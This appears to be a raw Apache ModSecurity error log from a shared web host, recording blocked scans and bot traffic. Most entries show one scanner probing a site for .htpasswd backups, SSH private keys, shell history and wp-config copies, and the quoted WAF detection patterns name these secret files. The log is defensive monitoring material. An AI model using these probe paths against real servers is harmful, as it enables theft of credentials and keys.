[Tue May 26 13:05:41.857743 2026] [security2:error] [pid 485064:tid 485123] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/.htaccess.old"] [unique_id "ahVNTT9tlF55stOmSqEMfAABADo"]
[Tue May 26 13:05:42.040019 2026] [security2:error] [pid 485064:tid 485189] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/.htpasswd.bak"] [unique_id "ahVNTj9tlF55stOmSqEMgAAAzXw"]
[Tue May 26 13:05:43.284687 2026] [security2:error] [pid 485064:tid 485276] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNTj9tlF55stOmSqEMoAAAANc"]
[Tue May 26 13:05:44.956681 2026] [security2:error] [pid 485064:tid 485185] [remote 211.23.68.235:64455] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.68.23.211.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahVNUD9tlF55stOmSqEM5gAA-ng"]
[Tue May 26 13:05:45.759847 2026] [security2:error] [pid 485064:tid 485203] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNUT9tlF55stOmSqENBgAAAI4"]
[Tue May 26 13:05:46.899909 2026] [security2:error] [pid 485064:tid 485222] [client 74.7.244.7:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.kardashevtechnologies.com"] [uri "/index.php"] [unique_id "ahVNUD9tlF55stOmSqEM9AAAAKE"]
[Tue May 26 13:05:46.901073 2026] [security2:error] [pid 485064:tid 485239] [client 74.7.244.7:33720] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.kardashevtechnologies.com"] [uri "/robots.txt"] [unique_id "ahVNUD9tlF55stOmSqEM8gAAsnc"]
[Tue May 26 13:05:47.821519 2026] [autoindex:error] [pid 485064:tid 485215] [client 198.235.24.213:57926] AH01276: Cannot serve directory /home2/jhonwy9v/stvica.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:05:47.846001 2026] [security2:error] [pid 485064:tid 485227] [client 173.209.63.146:59077] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 146.63.209.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/wp-login.php/wp-login.php"] [unique_id "ahVNUz9tlF55stOmSqENVQAAAKY"]
[Tue May 26 13:05:47.906664 2026] [security2:error] [pid 485064:tid 485188] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/.ssh/id_rsa"] [unique_id "ahVNUz9tlF55stOmSqENYAAAtHs"]
[Tue May 26 13:05:48.295208 2026] [security2:error] [pid 485064:tid 485297] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNUz9tlF55stOmSqENXwAAAOw"]
[Tue May 26 13:05:48.673234 2026] [security2:error] [pid 485064:tid 485176] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.bash_history"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/.bash_history"] [unique_id "ahVNVD9tlF55stOmSqENeQAAkW8"]
[Tue May 26 13:05:50.318795 2026] [security2:error] [pid 485064:tid 485320] [client 157.20.138.61:50550] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVNVj9tlF55stOmSqENvAAAAQM"]
[Tue May 26 13:05:50.319002 2026] [security2:error] [pid 485064:tid 485320] [client 157.20.138.61:50550] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVNVj9tlF55stOmSqENvAAAAQM"]
[Tue May 26 13:05:50.551101 2026] [security2:error] [pid 485064:tid 485201] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNVj9tlF55stOmSqENuwAAAIw"]
[Tue May 26 13:05:51.034655 2026] [security2:error] [pid 485064:tid 485068] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/config.php"] [unique_id "ahVNVz9tlF55stOmSqEN4QAAqgM"]
[Tue May 26 13:05:52.183843 2026] [security2:error] [pid 485064:tid 485264] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNVz9tlF55stOmSqEOAAAAAMs"]
[Tue May 26 13:05:52.940734 2026] [security2:error] [pid 485064:tid 485084] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/config.inc.php"] [unique_id "ahVNWD9tlF55stOmSqEOKgAAoxM"]
[Tue May 26 13:05:53.123668 2026] [security2:error] [pid 485064:tid 485174] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/config.old"] [unique_id "ahVNWT9tlF55stOmSqEOLgAA5W0"]
[Tue May 26 13:05:53.305147 2026] [security2:error] [pid 485064:tid 485091] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/config.bak"] [unique_id "ahVNWT9tlF55stOmSqEOOQAAsho"]
[Tue May 26 13:05:53.487473 2026] [security2:error] [pid 485064:tid 485112] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "samayikprasanga.in"] [uri "/config.backup"] [unique_id "ahVNWT9tlF55stOmSqEOPwAAyC8"]
[Tue May 26 13:05:54.026572 2026] [proxy:warn] [pid 485064:tid 485251] [client 45.33.14.5:59924] AH01092: no HTTP 0.9 request (with no host line) on incoming request and preserve host set forcing hostname to be thedebateafrica.org for uri /400.shtml
[Tue May 26 13:05:55.263938 2026] [security2:error] [pid 485064:tid 485288] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNWj9tlF55stOmSqEOcgAAAOM"]
[Tue May 26 13:05:55.455411 2026] [security2:error] [pid 485064:tid 485088] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/config/database.php"] [unique_id "ahVNWz9tlF55stOmSqEOjAAAhxc"]
[Tue May 26 13:05:55.635939 2026] [security2:error] [pid 485064:tid 485123] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/config/app.php"] [unique_id "ahVNWz9tlF55stOmSqEOjQAA9jo"]
[Tue May 26 13:05:55.652121 2026] [security2:error] [pid 485064:tid 485273] [client 45.33.14.5:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "thedebateafrica.org"] [uri "/index.php"] [unique_id "ahVNWj9tlF55stOmSqEOVQAAANQ"]
[Tue May 26 13:05:55.652849 2026] [security2:error] [pid 485064:tid 485251] [client 45.33.14.5:59924] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "thedebateafrica.org"] [uri "/400.shtml"] [unique_id "ahVNWj9tlF55stOmSqEOUQAAAL4"]
[Tue May 26 13:05:55.816423 2026] [security2:error] [pid 485064:tid 485189] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/config/auth.php"] [unique_id "ahVNWz9tlF55stOmSqEOkgAAuHw"]
[Tue May 26 13:05:55.996850 2026] [security2:error] [pid 485064:tid 485076] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/config/mail.php"] [unique_id "ahVNWz9tlF55stOmSqEOmQAAygs"]
[Tue May 26 13:05:56.177807 2026] [security2:error] [pid 485064:tid 485169] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/config/services.php"] [unique_id "ahVNXD9tlF55stOmSqEOnQAAz2g"]
[Tue May 26 13:05:56.358901 2026] [security2:error] [pid 485064:tid 485110] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/config/queue.php"] [unique_id "ahVNXD9tlF55stOmSqEOngAAhS0"]
[Tue May 26 13:05:56.539588 2026] [security2:error] [pid 485064:tid 485085] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/config/cache.php"] [unique_id "ahVNXD9tlF55stOmSqEOpQAA6hQ"]
[Tue May 26 13:05:56.720669 2026] [security2:error] [pid 485064:tid 485119] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/config/session.php"] [unique_id "ahVNXD9tlF55stOmSqEOqQAAtzY"]
[Tue May 26 13:05:56.902484 2026] [security2:error] [pid 485064:tid 485083] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/config/logging.php"] [unique_id "ahVNXD9tlF55stOmSqEOsgAAxxI"]
[Tue May 26 13:05:57.083123 2026] [security2:error] [pid 485064:tid 485111] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/config/filesystems.php"] [unique_id "ahVNXT9tlF55stOmSqEOtwABAi4"]
[Tue May 26 13:05:57.263385 2026] [security2:error] [pid 485064:tid 485101] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/config/broadcasting.php"] [unique_id "ahVNXT9tlF55stOmSqEOvgAA4yQ"]
[Tue May 26 13:05:57.443768 2026] [security2:error] [pid 485064:tid 485116] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/config/cors.php"] [unique_id "ahVNXT9tlF55stOmSqEOwgAA_TM"]
[Tue May 26 13:05:57.833733 2026] [security2:error] [pid 485064:tid 485114] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/configuration.php"] [unique_id "ahVNXT9tlF55stOmSqEO2QAA8TE"]
[Tue May 26 13:05:58.246334 2026] [security2:error] [pid 485064:tid 485298] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNXT9tlF55stOmSqEO2AAAAO0"]
[Tue May 26 13:05:58.585072 2026] [security2:error] [pid 485064:tid 485126] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/settings.php"] [unique_id "ahVNXj9tlF55stOmSqEO9gAAkj0"]
[Tue May 26 13:06:00.048442 2026] [security2:error] [pid 485064:tid 485243] [client 114.119.137.184:21053] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "rohiniventures.com"] [uri "/blog/category/wellhead/"] [unique_id "ahVNYD9tlF55stOmSqEPIQAAALY"], referer: http://rohiniventures.com/blog/category/wellhead/
[Tue May 26 13:06:00.107089 2026] [autoindex:error] [pid 485064:tid 485203] [client 31.220.88.107:59567] AH01276: Cannot serve directory /home2/svijakqj/siliconelevators.in/.well-known/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com
[Tue May 26 13:06:00.133665 2026] [security2:error] [pid 485064:tid 485136] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/wp-config.php"] [unique_id "ahVNYD9tlF55stOmSqEPJwAA7Uc"]
[Tue May 26 13:06:00.158965 2026] [security2:error] [pid 485064:tid 485311] [client 45.79.5.11:52643] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "cuatrodoce.com.mx"] [uri "/index.php"] [unique_id "ahVNXz9tlF55stOmSqEO_wAAAPo"]
[Tue May 26 13:06:00.205827 2026] [security2:error] [pid 485064:tid 485309] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNXz9tlF55stOmSqEPGgAAAPg"]
[Tue May 26 13:06:00.240601 2026] [security2:error] [pid 485064:tid 485299] [client 74.249.173.207:4326] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "corporatecargosolutions.onesoft.in"] [uri "/wk/index.php"] [unique_id "ahVNYD9tlF55stOmSqEPKgAAAO4"]
[Tue May 26 13:06:00.313618 2026] [security2:error] [pid 485064:tid 485129] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "samayikprasanga.in"] [uri "/wp-config.php.bak"] [unique_id "ahVNYD9tlF55stOmSqEPKwAAqkA"]
[Tue May 26 13:06:00.493577 2026] [security2:error] [pid 485064:tid 485158] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "samayikprasanga.in"] [uri "/wp-config.php.old"] [unique_id "ahVNYD9tlF55stOmSqEPMgABBF0"]
[Tue May 26 13:06:00.594114 2026] [security2:error] [pid 485064:tid 485225] [client 157.20.138.61:50652] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVNYD9tlF55stOmSqEPNgAAAKQ"]
[Tue May 26 13:06:00.594242 2026] [security2:error] [pid 485064:tid 485225] [client 157.20.138.61:50652] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVNYD9tlF55stOmSqEPNgAAAKQ"]
[Tue May 26 13:06:00.673419 2026] [security2:error] [pid 485064:tid 485138] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "samayikprasanga.in"] [uri "/wp-config.php.save"] [unique_id "ahVNYD9tlF55stOmSqEPOgABAUk"]
[Tue May 26 13:06:00.853307 2026] [security2:error] [pid 485064:tid 485137] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "samayikprasanga.in"] [uri "/wp-config.php.swp"] [unique_id "ahVNYD9tlF55stOmSqEPQQAA_Ug"]
[Tue May 26 13:06:01.033379 2026] [security2:error] [pid 485064:tid 485143] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "samayikprasanga.in"] [uri "/wp-config.php.orig"] [unique_id "ahVNYT9tlF55stOmSqEPQgAAlE4"]
[Tue May 26 13:06:01.213523 2026] [security2:error] [pid 485064:tid 485152] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "samayikprasanga.in"] [uri "/wp-config.php.txt"] [unique_id "ahVNYT9tlF55stOmSqEPSQAAkFc"]
[Tue May 26 13:06:01.287945 2026] [security2:error] [pid 485064:tid 485280] [client 114.119.138.154:47945] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "politica-global.com"] [uri "/"] [unique_id "ahVNYT9tlF55stOmSqEPSgAAANs"], referer: https://8coint.com/list.php?part=2025/09/26/93
[Tue May 26 13:06:01.393680 2026] [security2:error] [pid 485064:tid 485192] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "samayikprasanga.in"] [uri "/wp-config.php~"] [unique_id "ahVNYT9tlF55stOmSqEPTwAAyX8"]
[Tue May 26 13:06:01.574218 2026] [security2:error] [pid 485064:tid 485164] [remote 185.177.72.30:4522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/wp-config-sample.php"] [unique_id "ahVNYT9tlF55stOmSqEPUgAAoWM"]
[Tue May 26 13:06:01.839904 2026] [security2:error] [pid 485064:tid 485283] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNYT9tlF55stOmSqEPTgAAAN4"]
